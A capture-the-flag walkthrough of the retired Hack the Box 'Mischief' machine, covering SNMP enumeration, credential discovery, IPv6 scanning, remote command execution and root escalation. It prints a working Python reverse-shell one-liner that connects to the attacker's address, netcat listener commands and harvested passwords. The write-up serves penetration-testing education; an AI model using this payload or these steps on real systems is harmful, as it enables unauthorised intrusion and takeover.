Today we are going to solve another CTF challenge “Mischief”. Mischief is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to their experience; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Easy
Task: To find user.txt and root.txt file
Let’s start off with our nmap Aggressive scan to find out the open ports and services.
c:\Users\jacco>nmap -sV -sC 10.10.10.92 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:54 W. Europe Summer Time Nmap scan report for 10.10.10.92 Host is up (0.028s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 2a:90:a6:b1:e6:33:85:07:15:b2:ee:a7:b9:46:77:52 (RSA) | 256 d0:d7:00:7c:3b:b0:a6:32:b2:29:17:8d:69:a6:84:3f (ECDSA) |_ 256 3f:1c:77:93:5c:c0:6c:ea:26:f4:bb:6c:59:e9:7c:b0 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
But as you can observe that here we didn’t obtain much information, therefore further I scan for UDP port and from its result we got port 161 is open for SNMP.
c:\Users\jacco>nmap -sU 10.10.10.92 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 08:57 W. Europe Summer Time Nmap scan report for 10.10.10.92 Host is up (0.029s latency). Not shown: 999 open|filtered ports PORT STATE SERVICE 161/udp open snmp Nmap done: 1 IP address (1 host up) scanned in 34.87 seconds
Because we were knowing SNMP service is enable in the network, therefore I run nmap script command for SNMP enumeration.
root@kali:~/htb/mischief# nmap -p161 -sC -sV -sU 10.10.10.92 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:03 EDT Nmap scan report for 10.10.10.92 Host is up (0.028s latency). PORT STATE SERVICE VERSION 161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public) | snmp-info: | enterprise: net-snmp | engineIDFormat: unknown | engineIDData: b6a9f84e18fef95a00000000 | snmpEngineBoots: 19 |_ snmpEngineTime: 9h48m31s | snmp-interfaces: | lo | IP address: 127.0.0.1 Netmask: 255.0.0.0 | Type: softwareLoopback Speed: 10 Mbps | Traffic stats: 0.00 Kb sent, 0.00 Kb received | Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) | IP address: 10.10.10.92 Netmask: 255.255.255.0 | MAC address: 00:50:56:b9:80:1c (VMware) | Type: ethernetCsmacd Speed: 1 Gbps |_ Traffic stats: 2.17 Mb sent, 1.58 Mb received | snmp-netstat: | TCP 0.0.0.0:22 0.0.0.0:0 | TCP 0.0.0.0:3366 0.0.0.0:0 | TCP 10.10.10.92:22 10.10.14.20:15739 | TCP 127.0.0.1:3306 0.0.0.0:0 | TCP 127.0.0.53:53 0.0.0.0:0 | UDP 0.0.0.0:161 *:* | UDP 0.0.0.0:42621 *:* |_ UDP 127.0.0.53:53 *:* | snmp-processes: | 1: | Name: systemd | Path: /sbin/init | Params: maybe-ubiquity | 2: | Name: kthreadd --snip-- | 591: | Name: sh | Path: /bin/sh | Params: -c /home/loki/hosted/webstart.sh | 594: | Name: sh | Path: /bin/sh | Params: /home/loki/hosted/webstart.sh | 595: | Name: python | Path: python | Params: -m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/ | 617: | Name: sshd | Path: /usr/sbin/sshd | Params: -D --snip-- | zerofree-1.0.4-1; 0-01-01T00:00:00 |_ zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00 Service Info: Host: Mischief Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds
Hmmm!! So here I found something very interesting and it looks like the login credential to be used as authentication to connect port 3366.
Let’s navigate to port 3366 in the web browser and enter the following credential.
Username: loki Password: godofmischiefisloki
Here, we were welcomed by following web page where it was holding another credential. Let’s dig out another way to utilize this credential for login.
We use a python script called Enyx to find the ipv6 address of the target machine. You can get the script from this link.
root@kali:/opt# git clone https://github.com/trickster0/Enyx.git Cloning into 'Enyx'... remote: Enumerating objects: 70, done. remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70 Unpacking objects: 100% (70/70), done. root@kali:/opt# cd Enyx/ root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92 ################################################################################### # # # ####### ## # # # # # # # # # # # # # # # # # ###### # # # ## ## # # # # # # ## # # # # ###### # ## ## # # # # # # SNMP IPv6 Enumerator Tool # # # # Author: Thanasis Tserpelis aka Trickster0 # # # ################################################################################### [+] Snmpwalk found. Created directory: /var/lib/snmp/mib_indexes [+] Grabbing IPv6. [+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001 [+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c [+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT Nmap scan report for dead:beef::250:56ff:feb9:801c Host is up (0.034s latency). Not shown: 998 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds
So we navigate to the web browser and explore Target IPv6 address in the URL, it put a login page for command execution panel. So we try to login this page with the credential we found earlier but that wasn’t the valid credential.
Access Victim’s Shell
Further, I try brute force for username and successfully get login with the following combination:
|
1
2
|
Username: administrator
Password: trickeryanddeceit
|
Since it was Command Execution Panel where we can run arbitrary system commands, hence this was RCE which could be easily exploited and we can own reverse shell of the target machine.
But before that, you must know Ipv6 address of your local machine for addressing your IP as listening IP.
root@kali:/opt/Enyx# ifconfig tun0 tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500 inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20 inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global> inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link> unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC) RX packets 131 bytes 61874 (60.4 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 168 bytes 16553 (16.1 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
For the reverse shell, I use python reverse shellcode from pentestmonkey, and modify lhost IP from our IPv6 address. Since both nodes belong to IPv6, therefore we need a listener which can establish a reverse connection such as ncat, therefore we started ncat as the listener on port 443
root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$
python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
As soon we will execute the malicious python code, we will get a reverse connection via ncat or nc6.exe from https://www.sphinx-soft.com/tools/index.html
Great!! You can observe that we have access to remote terminal and let’s try to find out user.txt file to complete our first task. We found the user.txt file in the /home/loki but unable to read it. Although, there was another interesting file “credentials” and here we found another credential.
c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod
As port 22 was running, therefore we connect to the remote machine through ssh and successfully found user.txt file
PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 2 07:20:54 UTC 2019
System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied
While exploring more, I found .bash_history file where I found one more credential for root user but loki doesn’t have permission to execute switch user command.
Therefore, we move back to www-data user shell to run switch user command and enter the above-found password for root login, then try to find out root.txt file inside the root directory but there wasn’t any flag. Therefore with the help of find command, we try to enumerate the path of root.txt.
www-data@Mischief:/var/www/html$ su su Password: lokipasswordmischieftrickery root@Mischief:/var/www/html# find / -name root.txt find / -name root.txt /usr/lib/gcc/x86_64-linux-gnu/7/root.txt /root/root.txt root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt ae1*****807
Author: Jacco Straathof